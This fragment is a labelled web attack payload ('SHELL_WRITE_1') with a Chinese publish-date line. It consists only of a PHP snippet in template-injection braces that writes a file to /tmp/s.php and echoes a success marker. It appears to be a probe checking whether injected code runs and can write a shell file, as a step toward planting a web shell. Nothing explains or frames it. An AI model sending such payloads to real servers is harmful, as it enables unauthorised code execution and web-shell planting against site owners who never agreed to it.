SHELL_WRITE_1

发布时间:2026-06-25
{:$fp=fopen('/tmp/s.php','w');fwrite($fp,'');fclose($fp);echo 'DONE_'.file_exists('/tmp/s.php');}